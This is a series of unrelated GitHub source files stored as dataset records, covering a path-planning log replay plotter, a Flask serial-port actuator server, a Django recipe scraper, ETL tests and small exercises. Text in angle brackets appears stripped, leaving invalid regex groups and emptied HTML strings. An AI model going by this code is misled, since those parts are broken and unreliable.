re.compile('\\[Planning\\]x:(?P[0-9\\-\\.]+) y:(?P[0-9\\-\\.]+) heading:(?P[0-9\\-\\.]+) curvature:(?P[0-9\\-\\.]+) dDistance:(?P[0-9\\-\\.]+) speedx:(?P[0-9\\-\\.]+) speedy:(?P[0-9\\-\\.]+) accx:(?P[0-9\\-\\.]+) accy:(?P[0-9\\-\\.]+)')\nregexSplineStart = re.compile('===CubicSpline points start')\nregexSplineEnd = re.compile('===CubicSpline points end')\nregexSplinePos = re.compile('setControlPoints points: x:(?P[0-9\\-\\.]+) y:(?P[0-9\\-\\.]+)')\nregexVPLocalPos = re.compile('Local point X:(?P[0-9\\-\\.]+) Y:(?P[0-9\\-\\.]+)')\nregexCandidatePos = re.compile('getBestCandidatePos List data:(?P[0-9\\-\\.]+) ,(?P[0-9\\-\\.]+) ,(?P[0-9\\-\\.]+)')\nregexFrenetStatusPos = re.compile('FrenetStatus D:(?P[0-9\\-\\.]+) DS:(?P[0-9\\-\\.]+) DA:(?P[0-9\\-\\.]+) S:(?P[0-9\\-\\.]+) SS:(?P[0-9\\-\\.]+) SA:(?P[0-9\\-\\.]+) SStop:(?P[0-9\\-\\.]+) DWidth:(?P[0-9\\-\\.]+) TSS:(?P[0-9\\-\\.]+)')\nregexMatchedPos = re.compile('getMatchPoint point x:(?P[0-9\\-\\.]+) y:(?P[0-9\\-\\.]+) heading:(?P[0-9\\-\\.]+)')\nregexGobalPos = re.compile('Gobal Wgs getLongitude:(?P[0-9\\-\\.]+) getLatitude:(?P[0-9\\-\\.]+)')\n\nif __name__ == '__main__':\n\topts, args = getopt.getopt(sys.argv[1:], 'hn:w:', ['name=', 'word=', 'help'])\n\tcolor = ['ob', 'og','or','oc','om','oy','ok','ow']\n\tTracPosList = []\n\tSplineList = []\n\tVPPosList = []\n\ttotalFrame = [] ##list list\n\tFrameList = []\n\n\tbFirst = True\n\tfm = Frame()\n\tgroupIdx = 0\n\tif len(sys.argv) < 2:\n\t\tprint(\"#please input file#\")\n\telse:\n\n\t\tfilenameRead = os.getcwd() + \"/\"+ sys.argv[1]\n\t\tfile = open(filenameRead, \"r\")\n\t\tfilenameTracPos = os.getcwd() + \"/\" + \"TracPos.txt\"\n\t\tfilenameTracPosW = open(filenameTracPos, \"w\")\n\t\tprint (\"convet file:\"+ file.name)\n\t\tline = file.readline()\n\t\tprint 
(\"resolving.................\")\n\t\twhile line:\n\t\t\tmatched = re.search(regexTracPos, line)\n\t\t\tSplineStartmatched = re.search(regexSplineStart, line)\n\t\t\tSplineEndmatched = re.search(regexSplineEnd, line)\t\n\t\t\tSplinePosmatched = re.search(regexSplinePos, line)\n\t\t\tVPLocalPosmatched = re.search(regexVPLocalPos, line)\n\t\t\tCandidatePosmatched = re.search(regexCandidatePos, line)\n\t\t\tFrenetStatusPosmatched = re.search(regexFrenetStatusPos, line)\n\t\t\tMatchedPosmatched = re.search(regexMatchedPos, line)\n\t\t\tGobalPosmatched = re.search(regexGobalPos, line)\n\t\t\tif matched:\n\t\t\t\tps = TracPos()\n\t\t\t\tx = matched.group(\"x\")\n\t\t\t\ty = matched.group(\"y\")\n\t\t\t\theading = matched.group(\"heading\")\n\t\t\t\tcurvature = matched.group(\"curvature\")\n\t\t\t\tdDistance = matched.group(\"dDistance\")\n\t\t\t\tspeedx = matched.group(\"speedx\")\n\t\t\t\tspeedy = matched.group(\"speedy\")\n\t\t\t\taccx = matched.group(\"accx\")\n\t\t\t\taccy = matched.group(\"accy\")\n\t\t\t\tps.setData(x,y,heading, curvature,dDistance, speedx,speedy,accx,accy)\n\t\t\t\tfm.appendTracPos(ps)\n\t\t\tif SplineStartmatched:\n\t\t\t\tif bFirst:\n\t\t\t\t\tbFirst = False\n\t\t\t\telse:\n\t\t\t\t\ttotalFrame.append(FrameList)\n\t\t\t\t\tFrameList = []\n\t\t\t\tCurrentList = []\t\t\t\t\n\t\t\tif SplineEndmatched:\n\t\t\t\tSplineList.append(CurrentList)\n\t\t\tif GobalPosmatched:\n\t\t\t\t#print(\"yue changjiang append adddddddd##################\")\n\t\t\t\tFrameList.append(fm)\n\t\t\t\tfm = Frame()\n\t\t\t\tps = VPPos()\n\t\t\t\tps.set(float(GobalPosmatched.group(\"x\")),float(GobalPosmatched.group(\"y\")))\n\t\t\t\tfm.setGobalPos(ps)\t\n\t\t\tif SplinePosmatched:\n\t\t\t\tps = SplinePos()\n\t\t\t\tps.set(float(SplinePosmatched.group(\"x\")),float(SplinePosmatched.group(\"y\")))\n\t\t\t\tCurrentList.append(ps)\n\t\t\tif VPLocalPosmatched:\n\t\t\t\tps = VPPos()\n\t\t\t\tps.set(float(VPLocalPosmatched.group(\"x\")),float(VPLocalPosmatched.group(\"y\")))\n\t\t\t\tfm.setVP(ps)\n\t\t\tif MatchedPosmatched:\n\t\t\t\tps = VPPos()\n\t\t\t\tps.setAll(float(MatchedPosmatched.group(\"x\")),float(MatchedPosmatched.group(\"y\")),float(MatchedPosmatched.group(\"heading\")))\n\t\t\t\tfm.setMatchPos(ps)\n\t\t\tif FrenetStatusPosmatched:\n\t\t\t\tfp = FrenetPos()\n\t\t\t\tfp.set(float(FrenetStatusPosmatched.group(\"D\")),float(FrenetStatusPosmatched.group(\"DS\")),float(FrenetStatusPosmatched.group(\"DA\")),float(FrenetStatusPosmatched.group(\"S\")),float(FrenetStatusPosmatched.group(\"SS\")),float(FrenetStatusPosmatched.group(\"SA\")),float(FrenetStatusPosmatched.group(\"SStop\")),float(FrenetStatusPosmatched.group(\"DWidth\")),float(FrenetStatusPosmatched.group(\"TSS\")))\n\t\t\t\tfm.setFrenetPos(fp)\n\t\t\tif CandidatePosmatched:\n\t\t\t\tps = VPPos()\n\t\t\t\tps.setAll(float(CandidatePosmatched.group(\"x\")),float(CandidatePosmatched.group(\"y\")),float(CandidatePosmatched.group(\"heading\")))\n\t\t\t\tfm.appendCandidatePos(ps)\n\t\t\tline = file.readline()\n\t\t\n\t\tfor i in TracPosList:\n\t\t\ti.wirteMatlabData(filenameTracPosW)\n\t\ttotalFrame.append(FrameList)\n\t\tfile.close()\n\t\tfilenameTracPosW.close()\n\n\t\tfor sl in SplineList:\n\t\t\tsplnex = []\n\t\t\tsplney = []\n\t\t\tfor i in range(len(sl)):\n\t\t\t\t#if i != 0 and i != len(sl) -1:\n\t\t\t\tsplnex.append(sl[i].getX())\n\t\t\t\tsplney.append(sl[i].getY())\n\t\t\tprint(\"yue changjiang start ##################\")\t\t\n\t\t\tprint(splnex)\n\t\t\tprint(splney)\n\t\t\tprint(\"yue changjiang end 
##################\")\n\n\t\t\t#DrawSpline(splnex, splney)\n\t\t\ttx, ty = DrawSpline(splnex, splney)\n\n\t\t\tif show_animation:\n\t\t\t\tplt.figure(pltId)\n\t\t\t\tpltId = pltId + 1\n\t\t\t\tplt.title(\"Global Spline Path\")\n\t\t\t\tplt.plot(splnex, splney, 'b-')\n\t\t\t\tfor i in range(len(splnex)):\n\t\t\t\t\tplt.plot(splnex[i], splney[i], color[i%8],label=str(i))\t\t\t\t\t\n\t\t\t\tplt.plot(tx, ty, '-r')\n\t\t\t\tplt.axis('equal')\t\t\t\t\n\t\t\t\tplt.legend()\n\t\t\t\t\n\t\t\t\t#plt.show()\n\t\t\t\t#plt.savefig('global_path.png')\n\t\t\t\t\n\t\t\t\txarea = 20\n\t\t\t\tyarea = 20\n\t\t\t\tif show_animation:\n\t\t\t\t\tplt.figure(pltId)\n\t\t\t\t\tplt.gcf().canvas.mpl_connect('key_press_event',on_key_press)\n\t\t\t\t\tpltId = pltId + 1\n\t\t\t\t\tFrameList = totalFrame[groupIdx]\n\t\t\t\t\tfor i in range(len(FrameList)):\n\t\t\t\t\t\tif i != 0:\n\t\t\t\t\t\t\tframeData = FrameList[i]\n\t\t\t\t\t\t\tframeData.printFrame()\n\t\t\t\t\t\t\tstatus = frameData.getFrenetPos().getPrint()\n\t\t\t\t\t\t\tplt.title(\"Replay\")\n\t\t\t\t\t\t\tplt.xlabel(\"Status:\"+status+\"\\nMatchPos:\"+frameData.getMatchPos().printPos()+\"\\nGobalPos:\"+frameData.getGobalPos().printPos(),fontsize = 10)\n\t\t\t\t\t\t\t#plt.ylabel(frameData.getTYListPrint(),fontsize = 10,verticalalignment=\"bottom\",horizontalalignment=\"right\",rotation=\"horizontal\")\n\t\t\t\t\t\t\tif show_trac:\n\t\t\t\t\t\t\t\tplt.ylabel(frameData.getTYListPrint(),fontsize = 10,verticalalignment=\"center\",horizontalalignment=\"right\",rotation=\"horizontal\")\n\t\t\t\t\t\t\t#plt.xlabel(\"Status:\"+status+\"\\nGobalPos:\"+frameData.getGobalPos().printPos(),fontsize = 10)\n\t\t\t\t\t\t\tplt.plot(tx, ty, '-r')\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tplt.plot(frameData.getMatchPos().getX(), frameData.getMatchPos().getY(), \"bo\",label='Match Pos')\n\t\t\t\t\t\t\tplt.plot(frameData.getVP().getX(), frameData.getVP().getY(), \"rD\",label='VP Pos')\n\t\t\t\t\t\t\tplt.plot(frameData.getTXList(), frameData.getTYList(), \"gx\",label='Trace Pos')\n\t\t\t\t\t\t\tplt.plot(frameData.getCXList(), frameData.getCYList(), \"y+\")\n\t\t\t\t\t\t\tplt.xlim(frameData.getVP().getX() - xarea, frameData.getVP().getX() + xarea)\n\t\t\t\t\t\t\tplt.ylim(frameData.getVP().getY() - yarea, frameData.getVP().getY() + yarea)\n\t\t\t\t\t\t\tplt.gca().set_aspect('equal', adjustable='box')\n\t\t\t\t\t\t\tplt.legend()\n\t\t\t\t\t\t\tplt.grid(True)\n\t\t\t\t\t\t\tif getPress():\n\t\t\t\t\t\t\t\tsetPressFalse()\n\t\t\t\t\t\t\t\t#print(\"###########Change Next Set###########\")\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tplt.pause(0.0001)\t\n\t\t\t\t\t\t\t\tplt.cla()\t\t\n\t\t\t\t\tprint(\"###########Change Next Set###########\")\n\t\t\t\t\tgroupIdx = groupIdx + 1\t\t\n\t\t\t\t\tplt.show()\n\n\t\tprint(\"###########finsh###########\")\n\n\n","repo_name":"yangtzey/LogReplay","sub_path":"PlanReplay.py","file_name":"PlanReplay.py","file_ext":"py","file_size_in_byte":12441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37653139810","text":"#!/usr/bin/env python\nimport lsst.eotest.sensor as sensorTest\nimport siteUtils\nimport eotestUtils\n\nsensor_id = siteUtils.getUnitId()\n\ngains = eotestUtils.getSensorGains(jobname='fe55_offline')\nsflat_high_files = siteUtils.datacatalog_glob('*_sflat_500_flat_H*.fits',\n testtype='SFLAT_500',\n imgtype='FLAT',\n description='Superflat high files:')\ntask = sensorTest.CteTask()\ntask.run(sensor_id, sflat_high_files, flux_level='high', gains=gains)\n\nsflat_low_files = 
siteUtils.datacatalog_glob('*_sflat_500_flat_L*.fits',\n testtype='SFLAT_500',\n imgtype='FLAT',\n description='Superflat low files:')\ntask = sensorTest.CteTask()\ntask.run(sensor_id, sflat_low_files, flux_level='low', gains=gains)\n","repo_name":"lsst-camera-dh/harnessed-jobs","sub_path":"SLAC/cte_offline/v0/producer_cte_offline.py","file_name":"producer_cte_offline.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27562675243","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import ensure_csrf_cookie\nfrom django.conf import settings\nimport re\nimport os\n\nfrom bs4 import BeautifulSoup\nimport urllib3\nimport chefkoch2book.picture_grid\nfrom PIL import Image\nfrom chefkoch2book import picture_grid\nfrom symbol import except_clause\nimport json\n#from chefkoch2book import collage_maker\n\n\ndef makelist(table):\n result = []\n allrows = table.findAll('tr')\n for row in allrows:\n result.append([])\n allcols = row.findAll('td')\n for col in allcols:\n thestrings=[]\n thestring =\"\"\n for thestring in col.stripped_strings:\n thestring = re.sub(r'\\s+',' ',thestring)\n #thestring = thestring.replace('\\n', '')\n thestrings.append(thestring)\n thetext = ''.join(thestrings)\n result[-1].append(thetext)\n return result\n\n@ensure_csrf_cookie\ndef index(request):\n bg_images_list = os.listdir(os.path.join(settings.BASE_DIR, \"chefkoch2book/static/chefkoch2book/backgrounds/chapters\"))\n #backgoundimages =\n \n return render(request, 'chefkoch2book/index.html', {'backgroundimages' : json.dumps(bg_images_list)})\n\n\ndef get_recipe_data(url):\n \n recipe = {\"url\": url}\n \n soup = soupify(url)\n content = soup.find(\"div\", {\"class\": \"content-left\"})\n \n recipe['title'] = soup.find(\"div\", {\"id\": \"content\"}).find(\"h1\").getText()\n try:\n recipe['subtitle'] = soup.find(\"div\", {\"id\": \"content\"}).find(\"strong\").getText()\n except Exception:\n pass\n \n recipe['ingredients'] = makelist(soup.find(\"table\", {\"class\": \"incredients\"}))\n imagesdivs = soup.find_all('div', {\"class\": \"gallery-imagewrapper\"})\n recipe['recipe_info'] = makelist(content.find(\"table\", {'id':'recipe-info'}).extract())\n recipe['content'] = re.sub(r'\\s+',' ',content.get_text('
', strip=True)).replace('\\n', '')\n \n images = []\n for imagediv in imagesdivs:\n images.append(imagediv.find('img').get('data-bigimage'))\n recipe['images'] = images\n \n return recipe\n \n #ingredientsString = \"\"\n #for item in ingredients:\n # ingredientsString += str(item)\n\n\ndef get_recipe_data_json(request):\n url = request.POST['url'];\n recipe_data = get_recipe_data(url)\n return JsonResponse(recipe_data)\n\n# Create your views here.\ndef get_recipe(request):\n \n #url = request.POST['url']\n \n output = get_recipe_data('https://www.chefkoch.de/rezepte/drucken/1108101216891426/2309481a/1/Apfelkuchen-mit-Streuseln-vom-Blech.html')\n \n #output = \"
\"+ingredientsString+\"
\" + \"
\"+content_pretty+\"

INFO

\" + recipe_info.prettify() + \"
\" + '' #+ \"
\"+ingredients+\"
\"\n \n return render(request, 'chefkoch2book/recipes/normal-preview.html', output)\n\ndef soupify(url):\n \n if \"/drucken/\" not in url:\n url = url.replace(\"/rezepte/\", \"/rezepte/drucken/\")\n http = urllib3.PoolManager()\n response = http.request('GET', url)\n\n return BeautifulSoup(response.data, 'html.parser')\n\n\n\ndef get_image_grid(request):\n \n images = request.GET['urls'];\n \n collage_image = picture_grid.create_grid(images, 4, 4, 2100, 2970, 10, 0)\n response = HttpResponse(content_type=\"image/png\")\n collage_image.save(response, \"png\", dpi=(72,72))\n return response\n \n \n #soup = soupify('https://www.chefkoch.de/rezepte/drucken/1108101216891426/2309481a/1/Apfelkuchen-mit-Streuseln-vom-Blech.html')\n #imagesdivs = soup.find_all('div', {\"class\": \"gallery-imagewrapper\"})\n #images = []\n #for imagediv in imagesdivs:\n # images.append(imagediv.find('img').get('data-bigimage'))\n \n\n\ndef get_collage(request, url):\n soup = soupify(url)\n imagesdivs = soup.find_all('div', {\"class\": \"gallery-imagewrapper\"})\n images = []\n for imagediv in imagesdivs:\n images.append(imagediv.find('img').get('data-bigimage'))\n \n collage_image = picture_grid.create_grid(images, 5, 10, int(2100/2), int(2970/2), 10, 0)\n \n response = HttpResponse(content_type=\"image/png\")\n collage_image.save(response, \"png\", dpi=(72,72))\n return response\n\ndef get_normal_template(request):\n if request.POST['template'] is not None:\n template = request.POST['template']\n \n return render(request, 'chefkoch2book/recipes/normal.html')\n\ndef render_recipe(request, template):\n\n data = json.loads(request.POST['jsonData'])\n\n \n return render(request, 'chefkoch2book/recipes/'+ template + '/' + template +'.html', data)\n\n\n\ndef render_book(request):\n bg_images_list = os.listdir(os.path.join(settings.BASE_DIR, \"chefkoch2book/static/chefkoch2book/backgrounds/chapters\"))\n recipes = request.POST['jsonData']\n data = {\"recipes\": recipes}\n \n\n return render(request, 'chefkoch2book/recipes/twoColumns/twoColumns.html', data)\n\n","repo_name":"marplaa/chefkoch2cookbook","sub_path":"chefkoch2book/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74292410794","text":"\"\"\"\ncomposition\n\"\"\"\nfrom book import Book\n\n\nclass Author:\n \"\"\"Author class\"\"\"\n def __init__(self, name, books, title, author, pub_year):\n self.title = title\n self.author = author\n self.pub_year = pub_year\n self.my_author = Book(name, books)\n","repo_name":"jeethsoni/OOP-oops","sub_path":"modules/author.py","file_name":"author.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43049196237","text":"__author__ = 'Samuele'\n\nfrom flask import Flask, jsonify\nimport serial\n\napp = Flask(__name__)\n\nser = serial.Serial('/dev/ttymxc3', 115200, timeout=1)\nser.flushOutput()\n\ncurrent_fan_status = 0\ncurrent_irrigation_status = 0\ncurrent_light_value = 0\n\n@app.route(\"/fan\", methods=['GET'])\ndef get_fan_status():\n return jsonify({'status': current_fan_status})\n\n\n@app.route(\"/fan/\", methods=['GET'])\ndef set_fan_status(new_fan_status):\n global current_fan_status\n if new_fan_status > 0:\n current_fan_status = 1\n ser.write(\"F1\")\n else:\n current_fan_status = 0\n ser.write(\"F0\")\n\n return jsonify({'status': current_fan_status}), 
201\n\n\n@app.route(\"/irrigation\", methods=['GET'])\ndef get_irrigation_status():\n return jsonify({'status': current_irrigation_status})\n\n\n@app.route(\"/irrigation/\", methods=['GET'])\ndef set_irrigation_status(new_irrigation_status):\n if new_irrigation_status > 0:\n global current_irrigation_status\n current_irrigation_status = 1\n ser.write(\"I1\")\n else:\n current_irrigation_status = 0\n ser.write(\"I0\")\n\n return jsonify({'status': current_irrigation_status}), 201\n\n\n@app.route(\"/light\", methods=['GET'])\ndef get_light_status():\n return jsonify({'status': current_light_value})\n\n\n@app.route(\"/light/\", methods=['GET'])\ndef set_light_value(new_light_value):\n global current_light_value\n current_light_value = new_light_value\n\n ser.write(\"L\" + 'current_light_value')\n\n return jsonify({'status': current_light_value}), 201\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')","repo_name":"AppsThor/CooltivateActuator","sub_path":"serverUdoo.py","file_name":"serverUdoo.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20655530144","text":"import os\nfrom pathlib import Path\n\nimport pandas as pd\nimport pytest\n\nfrom src.aquisicao.inep.gestor import GestorETL\n\n\n@pytest.fixture(scope=\"module\")\ndef gestor_etl(dados_path: Path, test_path: Path, ano: int) -> GestorETL:\n etl = GestorETL(\n entrada=dados_path / \"externo\",\n saida=test_path,\n ano=ano,\n criar_caminho=False,\n reprocessar=False,\n )\n etl._inep = {k: \"\" for k in os.listdir(dados_path / f\"externo/censo_escolar\")}\n return etl\n\n\n@pytest.mark.run(order=1)\ndef test_extract(gestor_etl: GestorETL, ano: int) -> None:\n gestor_etl.extract()\n\n assert gestor_etl.dados_entrada is not None\n assert len(gestor_etl.dados_entrada) == 1\n assert gestor_etl.ano == ano\n assert {f\"{ano}\"} == set(gestor_etl.dados_entrada)\n assert isinstance(gestor_etl.dados_entrada[f\"{ano}\"], pd.DataFrame)\n\n\n@pytest.mark.run(order=2)\ndef test_gera_dt_nascimento(gestor_etl: GestorETL) -> None:\n base = gestor_etl.dados_entrada[f\"{gestor_etl.ano}\"]\n gestor_etl.gera_dt_nascimento(base)\n assert \"DT_NASCIMENTO\" in base\n assert base[\"DT_NASCIMENTO\"].dtype == \"datetime64[ns]\"\n\n\n@pytest.mark.run(order=3)\ndef test_processa_tp(gestor_etl: GestorETL) -> None:\n base = gestor_etl.dados_entrada[f\"{gestor_etl.ano}\"]\n gestor_etl.processa_tp(base)\n\n for c in gestor_etl._configs[\"DEPARA_TP\"]:\n if c in base:\n assert \"category\" == base[c].dtype\n\n\n@pytest.mark.run(order=4)\ndef test_remove_duplicatas(gestor_etl: GestorETL) -> None:\n base = gestor_etl.dados_entrada[f\"{gestor_etl.ano}\"]\n cols = set(base)\n\n base_id = gestor_etl.remove_duplicatas(base)\n\n assert base_id is not None\n depara_cols = set([\"ID_GESTOR\", \"ANO\"] + gestor_etl._configs[\"COLS_DEPARA\"])\n assert depara_cols == set(base_id)\n assert cols - set(gestor_etl._configs[\"COLS_DEPARA\"]) == set(base)\n\n gestor_etl.base_id = base_id # type: ignore\n\n\n@pytest.mark.run(order=5)\ndef test_ajusta_schema(gestor_etl: GestorETL) -> None:\n base = gestor_etl.dados_entrada[f\"{gestor_etl.ano}\"]\n base = gestor_etl.ajusta_schema(\n base=base,\n fill=gestor_etl._configs[\"PREENCHER_NULOS\"],\n schema=gestor_etl._configs[\"DADOS_SCHEMA\"],\n )\n for c in gestor_etl._configs[\"PREENCHER_NULOS\"]:\n if c in gestor_etl._configs[\"DADOS_SCHEMA\"]:\n assert base.shape[0] == base[c].count(), f\"{c}\"\n assert set(base) == 
set(gestor_etl._configs[\"DADOS_SCHEMA\"])\n for col, dtype in gestor_etl._configs[\"DADOS_SCHEMA\"].items():\n if not dtype.startswith(\"pd.\"):\n assert base[col].dtype == dtype\n\n base_id = gestor_etl.base_id # type: ignore\n base_id = gestor_etl.ajusta_schema(\n base=base_id,\n fill=gestor_etl._configs[\"PREENCHER_NULOS\"],\n schema=gestor_etl._configs[\"DEPARA_SCHEMA\"],\n )\n for c in gestor_etl._configs[\"PREENCHER_NULOS\"]:\n if c in gestor_etl._configs[\"DEPARA_SCHEMA\"]:\n assert base_id.shape[0] == base_id[c].count()\n assert set(base_id) == set(gestor_etl._configs[\"DEPARA_SCHEMA\"])\n for col, dtype in gestor_etl._configs[\"DEPARA_SCHEMA\"].items():\n if not dtype.startswith(\"pd.\"):\n assert base_id[col].dtype == dtype\n","repo_name":"Ignorancia-Zero/curso-ciencia-dados-treino","sub_path":"src/tests/aquisicao/test_gestor.py","file_name":"test_gestor.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"16622292011","text":"# -*- coding: utf8 -*-\r\nimport sqlite3\r\n\r\ndef Inserir_Dados_Arquivo(cpf, nome):\r\n conn = sqlite3.connect('arquivo_cdra')\r\n curs = conn.cursor()\r\n curs.execute('insert into alunos values (null, ?, ?, null, null)', (cpf,nome))\r\n print('CPF: ',cpf,' ', 'Nome: ', nome,'- Inserido com Sucesso!!!')\r\n conn.commit()\r\n conn.close()\r\n\t\r\n\t\r\n\t\r\n#Inserir_Dados_Arquivo('cpf','nome')\r\n\r\n\r\n\r\ndef Verificar_Inserir_Dados_Arquivo(cpf, nome):\r\n conn = sqlite3.connect('arquivo_cdra')\r\n curs = conn.cursor()\r\n sql = \"select cpf from alunos where cpf = '%s'\" % cpf\r\n curs.execute(sql)\r\n if len(curs.fetchall()) >=1 and len(cpf)==14:\r\n print('Dados já constantes no banco de dados....')\r\n else:\r\n curs.execute('insert into alunos values (null,?,?,null,null)', (cpf, nome))\r\n print('CPF: %s - Nome: %s - Inserido com Sucesso!' 
% (cpf, nome))\r\n curs.execute('select cpf from alunos')\r\n print('Total de dados inseridos no banco de dados: ', len(curs.fetchall()))\r\n conn.commit()\r\n conn.close()\r\n\r\nVerificar_Inserir_Dados_Arquivo('000.111.222-33','Fulano de Tal')\r\n","repo_name":"Richardson7ago/gerenciamento-de-arquivo","sub_path":"DBscript002_Inserção_Manual.py","file_name":"DBscript002_Inserção_Manual.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31912227703","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Feb 3 00:12:20 2019\r\n\r\n@author: cyshi\r\n\"\"\"\r\nfrom biosteam.units import * \r\n\r\nfrom biosteam_lca.units.energy_inventory import demand_per_hr, unit_lci, unit_lca\r\n\r\ndef energy_inputs(self):\r\n \"\"\" summary of all power utilities and heat utilities for the unit process.\"\"\"\r\n return ('Energy inputs per hour:{}'.format(demand_per_hr(self.heat_utilities, self.power_utility)))\r\n\r\ndef energy_inventory(self):\r\n \"\"\" returns a dict of inventory flows and amounts\"\"\"\r\n return unit_lci(self.heat_utilities, self.power_utility)\r\n\r\ndef multiLCA(self):\r\n return unit_lca(self.heat_utilities, self.power_utility)\r\n\r\nclasses = [\r\n LLECentrifuge, \r\n Flash, \r\n ConveyingBelt, \r\n CrushingMill, \r\n Shredder, \r\n Clarifier, \r\n RotaryVacuumFilter, \r\n LiquidsSplitCentrifuge, \r\n SolidsCentrifuge, \r\n VentScrubber, \r\n BinaryDistillation, \r\n SplitFlash, \r\n MultiEffectEvaporator,\r\n HXutility,\r\n Pump, \r\n Transesterification, \r\n VibratingScreen, \r\n EnzymeTreatment, \r\n StorageTank, \r\n MixTank, \r\n MagneticSeparator, \r\n MolecularSieve \r\n ]\r\n\r\n\r\n\r\n\r\nfor i in classes:\r\n setattr(i, 'energy_inventory', energy_inventory)\r\n setattr(i, 'multiLCA', multiLCA)\r\n#setattr(LLECentrifuge, 'multiLCA', energy_inventory)\r\n\r\n\r\n","repo_name":"scyjth/biosteam_lca","sub_path":"biosteam_lca/units/units_e.py","file_name":"units_e.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"3264994877","text":"# Estrutura de Dados\n# Aula 02: Recursividade \n# Professor: Rodolfo Carneiro Cavalcante\n# Aluno: Jônatas Duarte Vital Leite\n# Exercício 01: Implemente uma função recursiva que, dados dois números inteiros x e n, calcule o valor de x.n\nimport random\n\ndef multiplicacao(x, n):\n if(n == 0 or x == 0):\n return 0\n elif (n != 0):\n if(n < 0):\n x = -x\n n = -n\n return x + multiplicacao(x, n-1)\n return x\n\n# x = int(input(\"x: \"))\n# n = int(input(\"n: \"))\n\nx = random.randint(-10, 10)\nn = random.randint(-10, 10)\n\nprint(x,\"x\",n,\"=\",multiplicacao(x, n))\n\n","repo_name":"JonatasDVL/ufal","sub_path":"estrutura-de-dados/aula02/exercicios/ex001.py","file_name":"ex001.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33177983084","text":"from basic_calculator import calculate\n\nwith open('C:\\\\Development\\\\BCS-DevOps\\\\modules\\\\module01-general_purpose_coding\\\\labs\\\\python_calculator\\\\step_3.txt', mode='r') as f:\n text_string_list = f.read().splitlines()\n #print(len(text_string_list))\n\n\nstatement = text_string_list[1]\nexec_statements = [statement]\n\n\nstatement_visited = False\n\nwhile not statement_visited:\n\n calc_list = statement.split()\n\n if len(calc_list) > 2:\n calc_result = 
calculate(calc_list[2], int(calc_list[3]), int(calc_list[4]))\n else:\n calc_result = calc_list[1]\n\n statement = text_string_list[int(calc_result)]\n\n if not statement in exec_statements:\n exec_statements.append(statement)\n print(statement)\n else:\n print('Code stopping at line: ' + str(calc_result))\n statement_visited = True\n\n #print(calc_result)\n\n","repo_name":"ahfontalba/basic-python-calculator","sub_path":"step3_goto.py","file_name":"step3_goto.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13462174161","text":"from flask import Flask, request, jsonify, Blueprint\nfrom flask_sqlalchemy import SQLAlchemy\nfrom __init__ import db\nfrom models import EventoTable, ListaConvidadosTable, PessoaTable, MoradorTable\nfrom serializer import EventoSchema, ListaConvidadosSchema\nimport datetime\n\n\nbp_evento = Blueprint('evento', __name__)\n\n@bp_evento.route('/evento/criar', methods=['POST'])\ndef create():\n\n cpf = request.json['cpf']\n data = request.json['data']\n hinicio = request.json['inicio']\n hfinal = request.json['final']\n predio = request.json['predio']\n\n inicio = data+' '+hinicio\n final = data+' '+hfinal\n\n #try:\n\n mrd = PessoaTable.query.filter_by(cpf=cpf).first()\n mrd = MoradorTable.query.filter_by(morador_idpes=mrd.id).first()\n mrd = mrd.id\n\n new_evento = EventoTable(inicio, final, mrd, predio)\n\n db.session.add(new_evento)\n db.session.commit() \n \n return jsonify({\"message\":'Evento criado com sucesso!'})\n \n #except:\n #return jsonify({\"message\":'Erro ao criar evento. Verifique as informações inseridas e se a data e horário estão disponíveis.'})\n\n@bp_evento.route('/evento/mostrar', methods=['GET'])\ndef show_all():\n\n eventos = EventoTable.query.all()\n output = []\n cont = 0\n\n try:\n for e in eventos:\n pes = MoradorTable.query.get(eventos[cont].evento_idmrd)\n pes = PessoaTable.query.get(pes.morador_idpes)\n pes = pes.nome\n\n\n output.append({\"id\":eventos[cont].id, \"organizador\": pes, \"data\": eventos[cont].inicio.strftime('%d/%m/%Y'), \"inicio\": eventos[cont].inicio.strftime('%H:%M'), \"final\": eventos[cont].final.strftime('%H:%M'), \"predio\": eventos[cont].evento_idprd })\n cont = cont+1\n\n return jsonify(output)\n\n except:\n return jsonify({\"message\":'Sem registros.'})\n\n@bp_evento.route('/evento/mostrar/', methods=['GET'])\ndef show_by_id(id):\n evento = EventoTable.query.get(id)\n\n try:\n pes = MoradorTable.query.get(evento.evento_idmrd)\n pes = PessoaTable.query.get(pes.morador_idpes)\n\n\n\n output = {\"id\":evento.id, \"organizador\": pes.nome, \"data\": evento.inicio.strftime('%d/%m/%Y'), \"inicio\": evento.inicio.strftime('%H:%M'), \"final\": evento.final.strftime('%H:%M'), \"predio\": evento.evento_idprd }\n\n return jsonify(output)\n \n except:\n return jsonify({\"message\":'Sem registros.'})\n\n@bp_evento.route('/evento/alterar/', methods=['PUT'])\ndef modify(id):\n evento = 